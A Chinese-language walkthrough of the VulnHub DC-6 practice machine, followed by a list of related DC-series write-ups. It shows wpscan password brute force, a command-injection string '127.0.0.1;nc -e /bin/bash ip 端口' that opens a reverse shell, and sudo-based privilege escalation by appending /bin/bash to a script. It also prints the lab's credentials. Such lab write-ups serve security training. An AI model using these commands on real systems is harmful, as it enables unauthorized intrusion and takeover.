vulnhub DC系列 DC-6
总结:wpscan爆破,nmap提权
目录
下载地址
漏洞分析
信息收集
用户和密码爆破
命令执行
方法一:
方法二:
提权
下载地址
- DC-6.zip (Size: 619 MB)
- Download: http://www.five86.com/downloads/DC-6.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip
使用方法:解压后,使用vm直接打开ova文件。
漏洞分析
信息收集
这里还是使用DC-1的方法
1.给靶机设置一个快照
2.fping -agq 192.168.1.0/24 使用fping快速扫描该网段中存活的机子
3.将靶机关闭重新扫描一下,对比少的那个ip就是靶机的ip
4.使用快照快速将靶机恢复
注:ip段要看自己的
这里只有22和80端口是开启的,这里查看一下网站。
这里出现和dc-2一样的问题,这里修改一下hosts文件就可以了
linux 通常在/etc/hosts
vim /etc/hosts 然后添加一行 靶机ip wordy
这里在网站没有找到什么东西,使用dirsearch扫目录来看看
这里选择的url是http://靶机ip,并不是重定向以后的网址。
这里去访问/wp-login.php,有后台的登入,但是经过访问,尝试弱口令还是不行,准备使用插件wappalyzer看看网站的指纹。
用户和密码爆破
这里看了看决定使用cewl和wpscan的组合。
//根据网页的内容输出一个字典
cewl https://www.wordy.com/ -w pass.txt//使用命令枚举这个网站的用户
wpscan --url https://www.wordy.com/ -e u #使用这个没有枚举成功
wpscan --url http://wordy/ -e u #这个成功了,有点想不明白//将枚举出来的几个用户输入到user.txt
echo "admin\ngraham\nmark\nsarah\njens" > user.txt//尝试爆破密码
wpscan --url wordy -U user.txt -P passwd.txt
这里使用cewl获得的字典pass.txt,但是没有破解出来。。。。
去看别人的wp才知道要使用/usr/share/wordlists/rockyou.txt作为字典,但是这个字典很大,我就将一些关于密码的一些提取到一个字典中,这时候我已经知道密码是helpdesk01了
注意:rockyou.txt字典是一个压缩包需要我们自己解压。
//提取相关密码到一个新的字典文件
cat /usr/share/wordlists/rockyou.txt | grep help > passwd.txt//这里重新爆破
wpscan --url wordy -U user.txt -P passwd.txt
这里爆破出来了,http://wordy/wp-login.php 在这里登录
mark:helpdesk01
命令执行
这里找了半天也不知道那里有漏洞可以利用,多谢别人提醒,不然还不知道要找到什么时候
找到这里有一个命令执行的漏洞
这里看看。
这样就可以了,但是经过测试,这里有长度限制,但是经过查看只有前端的限制,后端没有限制,所以我们就可对前端修改就可以了
方法一:
这里长度限制15,但是我们可以修改。
方法二:
也是可以使用burpsuite来拦包修改,这里没有长度限制。
这里开始反弹shell
127.0.0.1;nc -e /bin/bash ip 端口//使用python搞一个伪shell python -c "import pty;pty.spawn('/bin/bash')"
提权
这里原本想先用sudo -l看看有没有什么可以利用的,但是这里我们不知道www-data的密码,这里查看内核版本号,经过查看也没有什么可以利用的。
最后在用户的根目录中发现了可以文件夹,/home/mark/stuff中发现一个things-to-do.txt
这里发现了graham用户的密码,然后我们通过su来到graham用户中
graham:GSo7isUM1D4
在这里发现sudo -l没有需要密码,而且还有东西,这里去看看
//来到提权文件那里 cd /home/jens//添加可以提权的东西 echo "/bin/bash" >> backups.sh//这里原本直接提权到root,但是失败了 sudo -u root ./backups.sh//这里选择到jens中 sudo -u jens ./backups.sh
这里发现sudo -l,又发现了东西
这里查看一些关于nmap的提权方法。
这里就提权到root了
vulnhub DC系列 DC-6相关推荐
- Vulnhub靶机DC系列-DC-8
Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...
- DC系列:1 (DC-1靶机,初级渗透详细教程)
DC-1靶机渗透 环境搭建 详情 描述 使用工具 一:信息收集 基础信息查询 0x01 查看存活主机 0x02 查看开放端口 0x03 查看端口服务 0x04 扫描网站根目录及指纹信息 0x05 访问 ...
- DC系列漏洞靶场-渗透测试学习复现(DC-1)
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们 ...
- 【CyberSecurityLearning 74】DC系列之DC-5渗透测试
目录 DC系列之DC-5渗透测试 实验环境: 实验步骤: 1.主机扫描,确定目标主机IP 2.对DC-5进行端口扫描 3.访问DC-5的web服务,了解相关信息 4.使用wfuzz测试页面参数 5.看 ...
- DC系列靶机DC-1
1,主机发现 1),nmap -sP 192.168.44.0/24 对当前网段内存活的主机进行扫描. 2),主机发现也可以使用 netdiscover -i eth0 -r 192.168.44.0 ...
- 新能源汽车6kw充电机,DC to DC双向升降压48~54VDC输入,输出320VDC,双向可以输入
新能源汽车6kw充电机,DC to DC双向升降压48-54VDC输入,输出320VDC,双向可以输入,输出. MCU TMS320C2 系列TI DSP高性能芯片 PI 2SC0435T方案,驱动英 ...
- VulnHub靶场系列:Flick
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...
- 干货 | 带你解锁AC/DC、DC/DC转换器基础
首先,我们过一下AC(交流)和DC(直流)的概念. 何谓AC Alternating Current(交流)的首字母缩写. AC是大小和极性(方向)随时间呈周期性变化的电流. 电流极性在1秒内的变化次 ...
- SC8701 120W DC TO DC 电源模块的设计
SC8701 120W DC TO DC 电源模块的设计 sc8701是一款同步4开关的buck-boost控制器,支持2.7~36V宽压输入,和2~36V输出,支持输入限流,输出限流,过温等保护功能 ...
- AC/DC、DC/DC转换器知识
首先,我们过一下AC(交流)和DC(直流)的概念. 何谓AC Alternating Current(交流)的首字母缩写. AC是大小和极性(方向)随时间呈周期性变化的电流. 电流极性在1秒内的变化次 ...
最新文章
- 一堆棋子java代码编程_网易2018校招内推编程题-堆棋子-C++实现
- 谢尔盖.布林的早期思想_谷歌联合创始人谢尔盖·布林(Sergey Brin)谈人工智能与自动化...
- Vuebnb:一个用vue.js和Laravel构建的全栈应用
- Ajax实现的城市二级联动一
- python conrurrent
- mybatis-generator运行报错Communications link failure
- ubuntu虚拟机apt报错:No module named ‘uaclient‘(替换所有的python3为/usr/bin/python3)xftp、xshell不能连接
- vb.net2019-多线程并行计算(6)
- ajax中success函数无法改变全局或局部变量的值
- 数据结构C#版笔记--堆栈(Stack)
- 线程魔术技巧:Java线程可以做的5件事
- 【渝粤教育】广东开放大学 刑法 形成性考核 (42)
- 【强化学习】可视化学习tensorboard
- 机器学习实践七----异常检测和推荐系统
- “2020 RT-Thread开发者大会” 思考感悟
- 屏幕录像专家6.0_迅捷屏幕录像工具和屏幕录像专家哪个更好用?
- 如何正确在Facebook投放产品广告?
- MYSQL互为主从同步(Windows)
- HIMSS 对EHR的定义
- linux 安装zh.utf 8,debian下安装locale并设置zh_CN.UTF-8